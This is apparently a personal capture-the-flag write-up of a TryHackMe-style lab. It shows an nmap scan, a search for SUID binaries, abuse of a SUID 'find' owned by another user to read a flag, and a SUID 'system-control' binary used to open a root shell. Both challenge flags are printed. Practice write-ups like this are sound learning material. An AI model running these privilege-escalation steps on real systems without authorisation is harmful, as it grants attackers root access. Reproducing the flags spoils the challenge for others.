Nmap scan


linux@ubuntu:~/Documents/nmap$ sudo nmap -p1-65535 -sC -sV -O -oA initial 10.10.157.213 -v

Starting Nmap 7.80 ( https://nmap.org ) at 2022-05-10 19:44 IST
NSE: Loaded 151 scripts for scanning.
NSE: Script Pre-scanning.
Initiating NSE at 19:44
Completed NSE at 19:44, 0.00s elapsed
Initiating NSE at 19:44
Completed NSE at 19:44, 0.00s elapsed
Initiating NSE at 19:44
Completed NSE at 19:44, 0.00s elapsed
Initiating Ping Scan at 19:44
Scanning 10.10.157.213 [4 ports]
Completed Ping Scan at 19:44, 0.05s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 19:44
Completed Parallel DNS resolution of 1 host. at 19:44, 0.03s elapsed
Initiating SYN Stealth Scan at 19:44
Scanning 10.10.157.213 [65535 ports]
Discovered open port 65534/tcp on 10.10.157.213
Completed SYN Stealth Scan at 19:44, 30.98s elapsed (65535 total ports)
Initiating Service scan at 19:44
Scanning 1 service on 10.10.157.213
Completed Service scan at 19:44, 0.04s elapsed (1 service on 1 host)
Initiating OS detection (try #1) against 10.10.157.213
Retrying OS detection (try #2) against 10.10.157.213
Retrying OS detection (try #3) against 10.10.157.213
Retrying OS detection (try #4) against 10.10.157.213
Retrying OS detection (try #5) against 10.10.157.213
NSE: Script scanning 10.10.157.213.
Initiating NSE at 19:44
Completed NSE at 19:44, 0.40s elapsed
Initiating NSE at 19:44
Completed NSE at 19:44, 0.01s elapsed
Initiating NSE at 19:44
Completed NSE at 19:44, 0.01s elapsed
Nmap scan report for 10.10.157.213
Host is up (0.010s latency).
Not shown: 65534 closed ports
PORT      STATE SERVICE VERSION
65534/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 35:46:3d:f6:4b:49:a1:f3:a3:ff:a5:27:43:d0:25:c0 (RSA)
|   256 55:93:ad:3c:06:a3:82:0e:72:12:4e:0b:91:4f:c6:2a (ECDSA)
|_  256 b5:c8:38:ed:5d:ed:53:4c:f8:14:28:d4:80:8b:7b:44 (ED25519)
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.80%E=4%D=5/10%OT=65534%CT=1%CU=34509%PV=Y%DS=2%DC=I%G=Y%TM=627A
OS:B2A1%P=x86_64-pc-linux-gnu)SEQ(SP=F9%GCD=1%ISR=10E%TI=Z%CI=I%II=I%TS=8)S
OS:EQ(SP=F9%GCD=1%ISR=10E%TI=Z%CI=I%TS=8)OPS(O1=M508ST11NW6%O2=M508ST11NW6%
OS:O3=M508NNT11NW6%O4=M508ST11NW6%O5=M508ST11NW6%O6=M508ST11)WIN(W1=68DF%W2
OS:=68DF%W3=68DF%W4=68DF%W5=68DF%W6=68DF)ECN(R=Y%DF=Y%T=40%W=6903%O=M508NNS
OS:NW6%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%A=S+%F=AS%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%
OS:DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T5(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%
OS:O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=40%
OS:W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y%DF=N%T=40%IPL=164%UN=0%RIPL=G%RID=G%
OS:RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%T=40%CD=S)

Uptime guess: 0.010 days (since Tue May 10 19:30:43 2022)
Network Distance: 2 hops
TCP Sequence Prediction: Difficulty=249 (Good luck!)
IP ID Sequence Generation: All zeros
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

NSE: Script Post-scanning.
Initiating NSE at 19:44
Completed NSE at 19:44, 0.00s elapsed
Initiating NSE at 19:44
Completed NSE at 19:44, 0.00s elapsed
Initiating NSE at 19:44
Completed NSE at 19:44, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 44.33 seconds
           Raw packets sent: 67086 (2.957MB) | Rcvd: 66335 (2.658MB)



find suids
find / -user root -perm -4000 -exec ls -ldb {} \;

Find igor suids
find / -user igor -perm -4000 -exec ls -ldb {} \; 2>/dev/null


holly@ip-10-10-157-213:/home$ find / -user igor -perm -4000 -exec ls -ldb {} \; 2>/dev/null
-rwsr-xr-x 1 igor igor 221768 Feb  7  2016 /usr/bin/find
-rwsr-xr-x 1 igor igor 2770528 Mar 31  2016 /usr/bin/nmap


Execute as igor POC
holly@ip-10-10-157-213:~$ touch xxx
holly@ip-10-10-157-213:~$ find xxx -exec whoami \;
igor
holly@ip-10-10-157-213:~$

holly@ip-10-10-157-213:~$ find xxx -exec cat /home/igor/flag1.txt \;
THM{d3f0708bdd9accda7f937d013eaf2cd8}


finding others suid
find / -user root -perm -4000 -exec ls -ldb {} \; 2>/dev/null

holly@ip-10-10-157-213:/home/ubuntu$ find / -perm -4000 -exec ls -ldb {} \; 2>/dev/null
-rwsr-xr-x 1 root root 44168 May  7  2014 /bin/ping
-rwsr-xr-x 1 root root 27608 Aug 23  2019 /bin/umount
-rwsr-xr-x 1 root root 44680 May  7  2014 /bin/ping6
-rwsr-xr-x 1 root root 40128 Mar 26  2019 /bin/su
-rwsr-xr-x 1 root root 30800 Jul 12  2016 /bin/fusermount
-rwsr-xr-x 1 root root 40152 Aug 23  2019 /bin/mount
-rwsr-xr-x 1 root root 40152 May 15  2019 /snap/core/7396/bin/mount
-rwsr-xr-x 1 root root 44168 May  7  2014 /snap/core/7396/bin/ping
-rwsr-xr-x 1 root root 44680 May  7  2014 /snap/core/7396/bin/ping6
-rwsr-xr-x 1 root root 40128 Mar 25  2019 /snap/core/7396/bin/su
-rwsr-xr-x 1 root root 27608 May 15  2019 /snap/core/7396/bin/umount
-rwsr-xr-x 1 root root 71824 Mar 25  2019 /snap/core/7396/usr/bin/chfn
-rwsr-xr-x 1 root root 40432 Mar 25  2019 /snap/core/7396/usr/bin/chsh
-rwsr-xr-x 1 root root 75304 Mar 25  2019 /snap/core/7396/usr/bin/gpasswd
-rwsr-xr-x 1 root root 39904 Mar 25  2019 /snap/core/7396/usr/bin/newgrp
-rwsr-xr-x 1 root root 54256 Mar 25  2019 /snap/core/7396/usr/bin/passwd
-rwsr-xr-x 1 root root 136808 Jun 10  2019 /snap/core/7396/usr/bin/sudo
-rwsr-xr-- 1 root systemd-network 42992 Jun 10  2019 /snap/core/7396/usr/lib/dbus-1.0/dbus-daemon-launch-helper
-rwsr-xr-x 1 root root 428240 Mar  4  2019 /snap/core/7396/usr/lib/openssh/ssh-keysign
-rwsr-sr-x 1 root root 106696 Jul 12  2019 /snap/core/7396/usr/lib/snapd/snap-confine
-rwsr-xr-- 1 root dip 394984 Jun 12  2018 /snap/core/7396/usr/sbin/pppd
-rwsrwxr-x 1 root root 8880 Dec  7  2019 /usr/bin/system-control
-rwsr-xr-x 1 igor igor 221768 Feb  7  2016 /usr/bin/find
-rwsr-xr-x 1 root root 32944 Mar 26  2019 /usr/bin/newuidmap
-rwsr-xr-x 1 root root 54256 Mar 26  2019 /usr/bin/passwd
-rwsr-xr-x 1 root root 39904 Mar 26  2019 /usr/bin/newgrp
-rwsr-xr-x 1 root root 136808 Jun 10  2019 /usr/bin/sudo
-rwsr-xr-x 1 root root 40432 Mar 26  2019 /usr/bin/chsh
-rwsr-xr-x 1 root root 71824 Mar 26  2019 /usr/bin/chfn
-rwsr-xr-x 1 root root 23376 Mar 27  2019 /usr/bin/pkexec
-rwsr-sr-x 1 daemon daemon 51464 Jan 14  2016 /usr/bin/at
-rwsr-xr-x 1 igor igor 2770528 Mar 31  2016 /usr/bin/nmap
-rwsr-xr-x 1 root root 75304 Mar 26  2019 /usr/bin/gpasswd
-rwsr-xr-x 1 root root 32944 Mar 26  2019 /usr/bin/newgidmap
-rwsr-xr-x 1 root root 14864 Mar 27  2019 /usr/lib/policykit-1/polkit-agent-helper-1
-rwsr-xr-x 1 root root 84120 Apr  9  2019 /usr/lib/x86_64-linux-gnu/lxc/lxc-user-nic
-rwsr-xr-- 1 root messagebus 42992 Jun 10  2019 /usr/lib/dbus-1.0/dbus-daemon-launch-helper
-rwsr-xr-x 1 root root 428240 Mar  4  2019 /usr/lib/openssh/ssh-keysign
-rwsr-sr-x 1 root root 106696 Aug 20  2019 /usr/lib/snapd/snap-confine
-rwsr-xr-x 1 root root 10232 Mar 27  2017 /usr/lib/eject/dmcrypt-get-device




Had to check write ups =(
Knew what i had to do but got sidetracked with pkexec and nmap

holly@ip-10-10-213-59:~$ system-control

===== System Control Binary =====

Enter system command: /bin/bash
root@ip-10-10-213-59:/home/ubuntu# whoami
root
root@ip-10-10-213-59:/home/ubuntu# cd /root
root@ip-10-10-213-59:/root# ls
flag2.txt  snap
root@ip-10-10-213-59:/root# cat flag2.txt
THM{8c8211826239d849fa8d6df03749c3a2}
root@ip-10-10-213-59:/root#
